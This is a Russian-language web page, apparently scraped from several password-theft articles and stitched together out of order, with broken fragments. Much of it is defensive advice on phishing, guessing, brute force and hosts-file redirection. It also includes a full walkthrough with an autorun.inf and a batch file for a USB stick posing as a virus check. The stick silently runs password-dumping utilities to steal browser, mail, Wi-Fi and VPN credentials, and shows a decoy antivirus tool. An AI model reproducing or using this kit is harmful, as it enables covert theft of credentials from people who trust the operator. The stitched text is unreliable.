Как воруют пароли от почты. Как воруют пароли Как украсть все пароли
На какие только ухищрения не идут злоумышленники, чтобы выкрасть у пользователя пароли к всевозможным сетевым ресурсам — страничкам в соцсетях, играм-онлайн, платёжным системам. Статистика кражи личных данных в сети пестрит тревожными цифрами. Чтобы не оказаться в числе жертв, потерявших свои аккаунты, давайте рассмотрим основные методы воровства паролей, которые используют хакеры — , и . Имея представление об этих зловредных «технологиях», им можно достаточно эффективно противостоять, соблюдая должный уровень безопасности и конфиденциальности личных данных.
Торжество справедливости и отмщения наступает в период кормёжки. Птенчики малюры, завидев приближающихся к гнезду родителей с вкусняшками в клюве, начинают, что есть силы трезвонить, ту самую трель, которую их научили петь в первые дни жизни. Получают еду, только исполнители «родного мотива» — законные наследники, а птенцы кукушки остаются ни с чем и вскоре умирают от голода.
На первый взгляд животрепещущая картина природы, но как она похожа на бескрайние просторы цифровых джунглей Интернета: и тут есть пароли; и тут есть персонажи — злые и добрые — хакеры и обычные пользователи.
Итак, уважаемый читатель, чтобы сберечь свои заветные логины и пароли, от подлых людишек, конечно трели вам разучивать не придётся. Но вот ознакомиться со способами похищения личных данных, совсем не будет лишним... Хотите мира? Готовьтесь к войне!
Главные орудия злоумышленника в этом способе - наивность и чрезмерное любопытство пользователя. Никаких изощрённых программных методов, коварных вирусов и прочих хакерских технологий.
Злодей, зная только логин от почтового ящика, вводит его в форму входа на сервис. А затем сообщает системе, что забыл пароль. На мониторе высвечивается контрольный вопрос — взломщик не знает на него ответ, но уже знает его содержание. Вот тут-то и начинается самое «интересное»: на основе темы вопроса он отправляет жертве «хитрое письмо», в котором в завуалированной форме пытается выведать правильный ответ. Коварное послание может выглядеть примерно так: «Добрый день! Мы, кулинарный сайт такой-то, ..... и т.д. А какое ваше любимое блюдо?» И это лишь отдельный пример. Ухищрений такого рода «гуляет по сети» великое мн ожество . Подробнее о социальной инженерии мы писали статье. Так что смотрите в оба, читая письма!
Кража куки (cookie)
Куки (от англ. «cookie» — печенье) — файл с данными сессии, которые веб-сайт сохраняет в браузере пользователя. В нём, в захешированном виде, хранятся логин, пароль, id и прочая информация, к которой в процессе онлайн-работы периодически обращается ресурс.
Хакер, зная уязвимости конкретного сайта (форум, почтовый сервис, соцсеть), пишет специальный скрипт, который «вытягивает» куки из браузера жертвы и отправляет ему. Без участия владельца аккаунта, это «чёрное дело» не обходится, так как именно он должен запустить зловредный скрипт. Поэтому код, перед отправкой, оборачивается в специальную «приманку»: в картинку, завлекающее письмо, просьбу и т.д. Главная задача — чтобы жертва перешла по предложенной ссылке. И если это всё-таки случается, хакерский скрипт куки из браузера передаёт снифферу (перехватчику сетевого трафика), установленному на стороннем хостинге. И только потом направляет пользователя, куда ему было обещано в сообшении — на сайт знакомств, видеохостинг, фотогалерею и пр. Естественно, владелец аккаунта об этих манипуляциях ничего не подозревает — вероломная процедура занимает всего 5 секунд.
Чтобы оставить взломщика, использующего брутфорс, с носом, создавайте сложные пароли, пользуйтесь .
Всем доброго времени суток. Закончились предновогодние авралы и зимние каникулы и пора уже что-нибудь написать в блог. Первую запись в этом году я хочу посвятить ликбезу по методам кражи паролей в противовес одной из предыдущих публикаций: Когда вас «взломали» не обязательно бежать менять все пароли . Сразу стоит уточнить, что материал направлен на неспециалистов по защите информации и носит ознакомительный характер. Хотя, возможно, специалисты тоже подчерпнут для себя что-то новое.
Как бы все не ненавидели пароли, это по сей день остается наиболее популярным средством идентификации, но, к сожалению, иногда у нас их крадут. Частично проблему помогает решить двухфакторная аутентификация, но лишь частично и лишь для наиболее критичных сервисов.
По статистике наиболее распространенными причинами потери контроля над аккаунтами становятся две вещи: использование простых (словарных) паролей и социальная инженерия. В этой статье я расскажу об основных методах взлома паролей естественно с целью повышения осведомленности в этом вопросе у широкой аудитории (использование материалов в деструктивных целях карается законом, автор ответственности не несет и прочее бла-бла-бла).
- Угадывание
Да, все так просто. Ваш пароль могут тупо угадать. Помните все эти эпизоды в голливудских фильмах, когда герои взламывают чей-то компьютер и в качестве пароля пробуют имена детей, бабушек, дедушек, дядь, теть, клички домашних животных жертвы и т. д.? Так вот, это действительно один из действенных способов взлома и этот архаичный метод эффективен до сих пор. Ведь сейчас все публикуют тонны информации о себе в социальных сетях и если пароль основан на каких-то данных, связанных с личностью владельца взламываемого аккаунта, то подбор пароля - дело времени (это как раз является причиной того, почему пароли нужно периодически менять).
Противодействие методу: в общем, надеюсь, вы поняли, что «tanyushka1990» - это плохой пароль, даже если Танюшка это не вы, а ваша любимая внучка. Используйте не угадываемые интуитивно пароли. Периодически (не реже раза в год) меняйте пароли хотя бы к критичным аккаунтам.
- Социальная инженерия
Социальная инженерия понятие достаточно широкое. Социальный инженер может взаимодействовать с жертвой как лично, так и по телефону, но чаще всего взаимодействует по электронным каналам связи - мессенджеры, соцсети, электронная почта. И здесь мы не будем рассматривать методы социнженерии как таковые, тут я лучше посоветую почитать классику жанра - книгу В. Саймона и К. Митника «Искусство обмана». Здесь нам важно то, что методы социальной инженерии в плане кражи паролей направлены на то, чтобы заставить жертву саму отдать свой пароль. Один из примеров выглядит так: злоумышленник представляется новым системным администратором и говорит сотруднику вашей организации, что ему нужен пароль от электронной почты этого сотрудника для проведения каких-нибудь сферических вакуумных тестов. Другой пример, когда личный контакт злоумышленника с жертвой отсутствует: веерная рассылка с фишинговой ссылкой и тревожным сообщением (например, на ваш аккаунт нажаловались, его заблокировали и вам «нужно» пройти по ссылке для разблокировки). Фишинговая ссылка ведет на страницу, заранее подготовленную злоумышленником и один в один похожую на страницу авторизации какого-нибудь популярного сервиса, например: vk.com, gmail.com, facebook.com и т. д. Что происходит дальше: жертва, думая, что это легальный сервис, вводит свой логин и пароль, эти идентификационные данные отправляются злоумышленнику, выдается сообщение об ошибке (ну кто из нас никогда не ошибался при вводе пароля? всякое бывает!) и далее пользователь перенаправляется на настоящую страницу авторизации, ведь грязное дело уже сделано и жертву нет смысла держать на поддельной странице. Кстати, если кто-то еще не знает, почему Windows просит нажать сочетание клавиш Alt-Ctrl-Del перед входом в систему, настоятельно советую загуглить и почитать.
Противодействие методу: обычно на предприятиях используются гибридные методы противодействия социальной инженерии (на тех предприятиях естественно, где вообще озаботились вопросами защиты информации), но нужно понимать, что поскольку социальный инженер может провзаимодействовать с жертвой и без использования каких-либо каналов связи (и, соответственно отфильтровать, заблокировать, отследить его сообщения мы не сможем), то единственным действительно эффективным методом противодействия является информирование сотрудников (ну, или себя самого, если речь идет о личной безопасности) о методах социальной инженерии. Ведь в наши дни мало кто поведется на наследство нигерийского принца или на развод «Мама, закинь денег на номер ХХХХ. Потом объясню», а ведь когда-то эти методы работали.
- Подглядывание
Здесь только вскользь упомяну о таких очевидных вещах, как о паролях на стикерах, которые приклеены к монитору или на бумажках под клавиатурой. Под подглядыванием здесь можно понимать и подглядывание процесса набора пароля. То есть пароль лучше вводить, когда за процессом никто не наблюдает. Есть люди с интересными способностями. Например, один мой знакомый поспорил со мной, что посмотрит, как я ввожу пароль на ноутбуке, а потом повторит ввод этого пароля сам. И действительно повторил. Я очень удивился, так как владею слепым десятипальцевым набором и могу ввести свой пароль очень быстро. Оказалось, что у знакомого какая-то особенная фотографическая память. Опасный человек =)
То есть подглядывание помогает злоумышленнику быстро получить готовый пароль и не прибегать к другим более сложным или ресурсоемким техникам, о которых речь пойдет далее. Но подглядывание пароля «глазами» это не единственный способ. Например, если вы вводили свой пароль на чужом компьютере и случайно сохранили пароль, вышли из аккаунта, но не очистили данные, то кто-то другой может не только войти в аккаунт не зная пароля (это еще полбеды), но и выудить этот пароль в явном виде, вставив в адресную строку браузера на странице где введен логин и пароль (замаскирован звездочками) вот такой простой скрипт:
javascript:(function(){var%20s,F,j,f,i;%20s%20=%20%22%22; %20F%20=%20document.forms;%20for(j=0;%20j [свернуть] Если пароль используется на других аккаунтах, то злоумышленник может получить доступ и к ним тоже. Вот поэтому специалисты по безопасности категорически не рекомендуют использовать один и тот же пароль для разных аккаунтов. Противодействие методу: не вводите пароль, когда кто-то стоит рядом и смотрит на ваши руки. Не вводите пароль на недоверенных устройствах. Если все же пришлось, позаботьтесь об очистке информации о паролях и cookies. К тому же на недоверенных устройствах могут быть установлены кейлоггеры . Мы плавно перешли от интуитивных и мошеннических техник угона паролей к техническим. Первая из них это подбор паролей по словарям. Пожалуй, даже неспециалисты в области информационной безопасности слышали из новостей о крупных утечках паролей к почтовым ящикам на разных почтовых сервисах. Как потом выяснилось большинство из этих утечек было связано не со взломами серверов поставщика услуг, а с банальным подбором паролей к почтовым ящикам по словарям. Большинство паролей «взломанных» почтовых ящиков представляли из себя комбинации типа «123456», «qwerty» и тому подобные. В разделе «Материалы» я выложил парочку словарей с паролями (их можно пополнять самостоятельно), которые можно использовать как в различных инструментах типа John the Ripper или Hydra , либо для проверки банальным поиском есть ли в словаре ваш пароль. Если есть, то срочно меняем! Противодействие методу: использование сложных, не словарных паролей. Название метода происходит от двух английских слов: brute - грубая и force - сила. Из названия интуитивно понятно, чем этот метод отличается от предыдущего - здесь просто перебираются все возможные комбинации пароля. Метод затратен по времени и по ресурсам, ведь для подбора таким методом нужны немалые вычислительные ресурсы. Поэтому к такому методу злоумышленники прибегают только в крайних случаях. Уменьшить время подбора может позволить, например, знание точной длины пароля или знание того, что в пароле точно нет специальных символов и цифр. Таким образом, сокращается количество возможных комбинаций. Противодействие методу: использование длинных хаотичных паролей и периодическая смена паролей. Все кому в последние годы приходилось восстанавливать пароль к какому-либо сервису должны были заметить, что если раньше некоторые сервисы просто присылали вам ваш пароль на электронную почту, то теперь вам нужно сразу же придумать новый пароль. Это связано с тем, что ни один уважающий себя сервис не хранит пароли в открытом виде. Хранятся пароли в виде хешей. Если коротко, то хешем называется результат преобразования текста (в нашем случае - пароля) некой необратимой математической функцией. Результат преобразования распространенным алгоритмом MD5 слова «password» (без кавычек) выглядит следующим образом:. Примерно в таком виде и хранятся наши пароли у провайдеров услуг, и поскольку считается, что функции необратимые, то сами провайдеры вроде как не могут знать наш пароль и выслать нам его в открытом виде. Подробнее о хешировании можно почитать . Радужные таблицы, если очень грубо говорить позволяют восстановить пароль по хэшу. Полный процесс конечно гораздо сложнее, чем кажется. Поэтому, кому интересно ознакомиться с технологией подробнее, можно начать со страницы в википедии . Казалось бы, что с помощью радужных таблиц можно было бы взломать почти любой пароль, но и тут есть свои сложности для злоумышленника. Если при брутфорсе нужны временные и ресурсные затраты на сам перебор, то в случае радужных таблиц то же самое нужно для генерации этих самых таблиц. При этом любой набор радужных таблиц будет иметь множество ограничений, к ним относятся: ограничение на длину пароля, ограничение на набор символов, ограничение на конкретный алгоритм хэширования. В сети в общем доступе можно найти радужные таблицы для подбора паролей не длиннее 6 символов, которые содержат только буквы английского алфавита обоих регистров, но без спецсимволов и цифр. Но вот уже за что-то посерьезнее просят денег. Противодействие методу: засолка хешей. К сожалению, данный вид противодействия доступен только на уровне администраторов сервисов и никак не зависит от действий конечного пользователя. Под гибридными методами понимается сочетание различных методов, приведенных выше, в совокупности. На самом деле, пример использования методов «брутфорс» + «подглядывание» уже был приведен выше. Например, злоумышленник может подсмотреть не пароль целиком, а лишь символы, из которых состоит пароль. Это позволит ему в параметрах при брутфорсе указать только нужные символы, а все остальные исключить из перебора, тем самым существенно сократив количество возможных комбинаций. Еще один пример гибридного метода: берется словарное слово и в нем делаются замены букв на спецсимволы. Например, берется словарный пароль «password» и пробуются комбинации «password123», «p@ssword», «pa$$w0rd» и т. д. Противодействие гибридным методам заключается в использовании всех методик противодействия, приведенных выше. реальным
тюремным сроком!
Попробуем разобраться, как можно украсть пароли с компьютера, если у вас есть доступ к нему, но так чтобы жертва ничего не заподозрила. Один из способов – создать специальную флэшку с утилитами, которые смогут вытащить пароли из браузеров и других программ, сохраняющих пароли для удобства пользователя. Скачаем Password Recovery утилиты, которые нам потребуются: * MessenPass - восстанавливает пароли к большинству популярных программ для обмена мгновенными сообщениями: MSN Messenger, Windows Messenger (In Windows XP), Windows Live Messenger (In Windows XP And Vista), Yahoo Messenger (Version 5.x/6.x), ICQ Lite 4.x/5.x/2003, AOL Instant Messenger, AIM 6.x, AIM Pro, Trillian, Miranda, and GAIM; * Mail PassView - извлекает сохраненные пароли из почтовых клиентов: Outlook Express, Microsoft Outlook 2000 (POP3/SMTP Accounts only), Microsoft Outlook 2002/2003/2007, Windows Mail, IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free, and Web-based email accounts; * IE Passview - отображает логины и пароли, сохраненные "осликом"; * ChromePass - отображает логины и пароли, сохраненные браузером Google Chrom; * PasswordFox - получает все пароли, сохраненные Firefox"oм; * Protected Storage PassView - восстанавливает все пароли, сохраненные в защищенном хранилище; * Dialupass - вытаскивает все пароли dialup/VPN сессий; * Network Password Recovery - отображает пароли которые вы используете для шар в локальной сети а так же пароли.NET Passport/Messenger account; * PstPassword - извлекает пароли из файлов личных папок Outlook - .PST; * WirelessKeyView - восстанавливает все ключи беспроводных сетей (WEP/WPA), которые хранятся на вашем компьютере. Еще существует утилитка OperaPassView, но она пока не поддерживает командную строку. Поэтому ее не включаем в наш набор. Еще нам необходима утилитка Hidden Start (). Так же скачаем для того чтобы замаскировать наши утилиты. Его мы будем запускать в конце операции "тырения" паролей. И только его работу будет видеть жертва на своем экране. Подготавливаем флэшку.
1. Создаем на флэшке две папки: 2. В папку флэшка:\prog\ заливаем все экзешники – утилиты, hstart.exe, KK.exe 3. В корне флешки создаем autorun.inf со следующим содержанием: 4. Создаем батник launch.bat: echo off If Not Exist "%programfiles%\Mozilla Firefox\" GoTo End Рассмотрим команды батника поподробнее: echo off – запрет на вывод в окно CMD результатов выполнения echo %computername%\%username% Ъte% %time% >> prog/log/_log.txt – в файл prog/log/_log.txt записать имя компьютера, имя пользователя, дату и время start prog/ChromePass.exe /stext prog/log/%computername%_chrom.txt – запустить утилиту ChromePass.exe которая по выполнению должна сохранить пароли в файл prog/log/имя_компьютера_chrom.txt Аналогично и для остальных утилит. Единственное замечание – перед запуском PasswordFox.exe проверим, что FF вообще установлен на компьютере жертвы. Просто если ФФ не установлен, то утилита PasswordFox.exe выдает сообщение с ошибкой. start prog/KK.exe – маскируем свои действия запуском настоящей утилиты для удаления червя Net-Worm.Win32.Kido от Лаборатории Касперского Все – флэшка готова. Теперь злоумышленнику достаточно просто подключить флэшку к компьютеру жертвы и в появившемся рорир-окне выбрать "Проверить комп на вирусы", чтобы вытащить все сохраненные пароли на этом компьютере. Обоснование необходимости запуска "проверки на вирусы" достаточно просто, особенно если жертва вам доверяет. Как же бороться?
1. Не сохраняйте пароли – лучше пользоваться какой-нибудь программкой типа Password Keeper или eWallet. 3. Наличие нормального антивируса обязательно! Хотя он и ругнется только на несколько этих утилит. Поводом для написания этой статьи стала заметка в журнале "Хакер". Данная статья написана исключительно в ознакомительных целях. Кража чужих паролей влечет за собой уголовную ответственность по ч. 1 ст. 272 УК РФ «Неправомерный доступ к компьютерной информации», и грозит реальным
тюремным сроком!
Не все знают о том, что кража пароля в социальной сети либо на любом другом онлайн-ресурсе является уголовно наказуемым преступлением. Насколько реальна такая кража, какое наказание за нее может получить правонарушитель, и что делать, если вы стали жертвой, расскажем ниже. Завладение паролем ВК вполне реально, такая кража может повлечь негативные последствия для владельца аккаунта. В интернете можно найти множество историй о том, как учетные записи взламывали с целью получения личной информации или распространения сведений, порочащих репутацию владельца. Кражи осуществляются самыми разными способами: Вне зависимости от способа действия злоумышленника являются уголовно наказуемыми. Состав преступления образуется по ст. 272 УК РФ (неправомерный доступ к компьютерной информации). Если вы стали жертвой взлома в социальной сети Вконтакте или в любой другой, то первое, что вам необходимо сделать, - это обратиться в службу поддержки с просьбой заблокировать аккаунт. Возможно, придется предоставить какие-то доказательства того, что именно вы являетесь владельцем профиля. Если украденный пароль установлен еще где-то, будь то социальные сети, электронная почта и т.п., то необходимо обязательно поменять комбинации на всех остальных сервисах. Специалисты по компьютерной безопасности не рекомендуют устанавливать один и тот же пароль на разных сайтах, поскольку в подобных случаях злоумышленники, завладевшие одним аккаунтом, без труда смогут взломать и остальные. Всех друзей, родственников и знакомых стоит предупредить о том, что ваш профиль был взломан. Злоумышленники могут попытаться рассылать от вашего имени различные сообщения, содержащие вредоносные ссылки или просьбы о помощи. Ваши друзья могут пострадать, если поверят и нажмут на ссылку либо перечислят деньги на указанный в сообщении счет или номер мобильного телефона. Если действиями правонарушителя вам был причинен серьезный вред, то имеет смысл обратиться в правоохранительные органы. Для этого потребуется написать заявление в полицию, в котором должна содержаться просьба о привлечении злоумышленников к ответственности по ст. 272 УК РФ. Согласно этой статье неправомерный доступ будет уголовно наказуемым лишь в том случае, если информация была: Учитывая тот факт, что под блокированием подразумевается, в том числе, целенаправленное затруднение доступа законных пользователей к данным, кража пароля ВК подпадает под санкции ст. 272 УК РФ. За подобные деяния предусмотрены следующие виды наказания: При рассмотрении дела суд будет решать, какое именно из перечисленных наказаний назначить. Оно будет зависеть, в том числе от степени вреда, причиненного владельцу аккаунта и иным лицам. Если был причинен крупный ущерб (на сумму более 1 000 000 рублей), то размер штрафа может возрасти до 300 000 рублей, а срок тюремного заключения - до 4 лет. Крупный ущерб может быть причинен в случае взлома аккаунта коммерческой фирмы. В подобных ситуациях речь может идти также и о защите деловой репутации, пострадавшей в результате действий злоумышленников. Существуют вполне определенные и понятные правила того, как вести себя, чтобы защититься от кражи: Если вы уже стали жертвой злоумышленников, обратитесь за помощью к нашим юристам. Они помогут на всех этапах, начиная с составления и направления заявления в полицию и заканчивая судебным разбирательством. Звоните нам или оставляйте свое сообщение на сайте. За последние дни в новостях рассказали, что в Интернете выложили логины и пароли от миллионов почтовых ящиков почты Гугла (Gmail), почты Яндекса и почты mail.ru. Подобрать любой мало-мальски сложный пароль невозможно, поскольку большинство сервисов настроено так, что после нескольких ошибок предлагает пользователю вводить капчу, либо же просто блокирует IP с которого ведётся брутфорсинг. В подавляющем большинстве в утечке паролей виноваты не хитроумные взломы популярных сервисов, а сами пользователи, которые допустили компрометацию пароля. Поэтому хотелось бы коснуться вопроса, как хакеры воруют ваши пароли и что можно сделать, чтобы это предотвратить. Суть заключается в следующем. Под любым предлогом пользователя заманивают на сайт хакера. Зачастую, на этом сайте одна единственная страница, но выглядит она в точности, как настоящая страница для авторизации в вашем почтовом ящике. Невнимательный пользователь вводит логин и пароль, которые прямиком попадают к злоумышленнику. Как бороться: – каждый раз, когда возникает необходимость авторизации, посмотрите на домен. Зачастую, злоумышленники могут создавать созвучные доменные имена, например: www.mail.ru.free-host.net www.yandex-ru.spb.ru www.gmail-com.com www.yandex.ru.mail.redte.ru www.turian.ru/mail.ru www.mail-compose.ru/yandex 145.35.77.1/mail.ru Каждый из этих доменов не имеет ни какого отношения к популярным почтовым сервисам. Как правило, авторизация запрашивается не каждый раз, поэтому прежде чем ввести пароль потратьте некоторое время на изучение доменного имени. Отдельно стоит обратить внимание на то, как хакеры пытаются заманить вас на свои зловредные страницы. Приведу несколько примеров, но ими варианты не исчерпываются: – вам на почту приходит письмо, в котором сообщается, что вы, что-то получили (открытку или что-то другое приятное, или наоборот – что-то очень неприятное и требуются ваши немедленные действия, чтобы аккаунт не заблокировали, деньги не потерялись и т.д.) и есть ссылка по которой надо перейти; – в смс сообщается, что вы получили письмо и предлагается перейти по ссылке, чтобы прочитать это письмо (чтобы у мужчин отключился мозг, может быть уточнено, что письмо отлучен от <любое женское имя>). – во всплывающих окнах на сайтах или в программах сообщается, что вы получили письмо. Помните об этом, будьте просто внимательны. Обращайте внимание на мелочи. Например, зачастую мы выбираем в браузере опцию «Сохранить пароль», и когда настоящий почтовый сервис просит повторно авторизоваться (это случается время от времени), то оба окошечка (и логин и пароль) зачастую уже заполнены и нам нужно нажать только кнопку входа. Хакеры могут вписать ваш логин (особенно если отправляли вредоносную ссылку вам по почте), но хакеры не могут вписать пароль. Поэтому, если вы заметили необычное поведение, внимательно изучите домен. Если домен правильный, но всё равно что-то не так, то возможно у вас другая проблема, которая рассмотрена в следующем пункте. В любом компьютере под управлением операционной системы Windows есть файл hosts, который располагается в каталоге C:WindowsSystem32Driversetc Там можно прописать переадресацию. В результате которой домен в адресной строке вашего браузера будет совершенно истинным, но в реальности вы будете попадать на страничку авторизации хакеров, которые, естественно, украдут ваш пароль: На что обратить внимание: – откройте любым текстовым редактором файл C:WindowsSystem32Driversetchosts и посмотрите в него — там не должно быть упоминаний популярных сайтов, или чего-то подозрительного; – ещё одним показателем является то, что вы вводите верные логин и пароль, но авторизация не происходит; – на странице авторизации вас просят отправить смс на короткий номер под любым предлогом (подтверждения телефона, попытка взлома и подтверждения, что это вы, акаунт не активен и будет удалён если не подтвердить, необходимо ввести числа полученные в ответном смс сообщении и т. д.). Как с этим бороться: – обычно, файл hosts изменяется вирусами, необходимо установить антивирусную программу, если таковой нет и проверить компьютер. Если антивирусная программа есть, обновите её и проверьте компьютер. – удалить лишние строки из файла hosts Ещё одним вариантом являются килогеры. Это такие программы, которые перехватывают всё, что вы набираете на клавиатуре и отправляют хакеру. Фактически, это вирусы, и бороться с этими программами нужно точно так же как и с другими вирусами. Если вашу почту постоянно «взламывают», то проверьте компьютер антивирусом, не скачивайте подозрительные исполняемые файлы (у них расширение.exe, .msi, .hta, .scr, могут быть и некоторые другие, но в чаще всего всё-таки.exe). Установите антивирус, который может обновляться, регулярно его обновляйте и проверяйте свой компьютер (ну или переходите на Linux). Как с этим бороться: – если вы обнаружили вирус, то, на всякий случай, поменяйте свои пароли от почты и от социальных сетей; – об этом уже говорилось, но это такая распространённая ошибка, что подчеркну ещё раз, не скачивайте исполняемые файлы из подозрительных источников. Скачивайте их с официальных сайтов. Не скачивайте файлы, присланные вам почту от незнакомых людей (даже если это фотографии "меня в купальнике" и т.п.). Относитесь с осторожностью к исполняемым файлам, даже если они присланы знакомыми вам людьми – могло получиться так, что их почту взломали раньше вашей и от их имени хакер рассылает свои вредоносные программы; – в Интернет кафе и во всех ситуациях, когда нужно залогиниться на чужом компьютере, используйте экранную клавиатуру, это не является 100% гарантией, но многим килогерам такой поворот будет не по зубам. Как бы это уныло не звучало, но именно такими тривиальными путями большинство пользователей теряют свои пароли, и здесь не имеют место ни сложные хакерские атаки на почтовые сервисы, ни изощрённый криптоанализ.
Все утилиты можно взять .
флэшка:\prog\
флэшка:\prog\log\
open=prog/hstart /NOCONSOLE "launch.bat"
ACTION= Проверить комп на вирусы
Здесь action – кнопка, которая будет отображаться в окне выбора действий при подключении флэшки, а open – команда, которую нужно выполнить при выборе этого действия. Эта команда включает в себя запуск бат-ника в скрытом режиме с помощью утилиты Hidden Start.
echo %computername%\%username% Ъte% %time% >> prog/log/_log.txt
start prog/ChromePass.exe /stext prog/log/%computername%_chrom.txt
start prog/Dialupass.exe /stext prog/log/%computername%_dialupass.txt
start prog/iepv.exe /stext prog/log/%computername%_iepv.txt
start prog/mailpv.exe /stext prog/log/%computername%_mailpv.txt
start prog/mspass.exe /stext prog/log/%computername%_mspass.txt
start prog/netpass.exe /stext prog/log/%computername%_netpass.txt
start prog/pspv.exe /stext prog/log/%computername%_pspv.txt
start prog/PstPassword.exe /stext prog/log/%computername%_pstpassword.txt
start prog/WirelessKeyView.exe /stext prog/log/%computername%_wirelesskeyview.txt
start prog/PasswordFox.exe /stext prog/log/%computername%_passwordfox.txt
:End
start prog/KK.exe
Ее назначение - защита ваших данных от злоумышленника.
Кто осведомлен, тот вооружен!
Насколько реальна кража пароля Вконтакте?
Обратите внимание!
Что делать, если вас взломали?
Обратите внимание!
Обратите внимание!
Как обезопасить себя от кражи пароля?
1. Поддельные страницы авторизации
2. Переадресация через файл hosts
3. Программы для отслеживания нажатий на клавиатуре (килогеры)
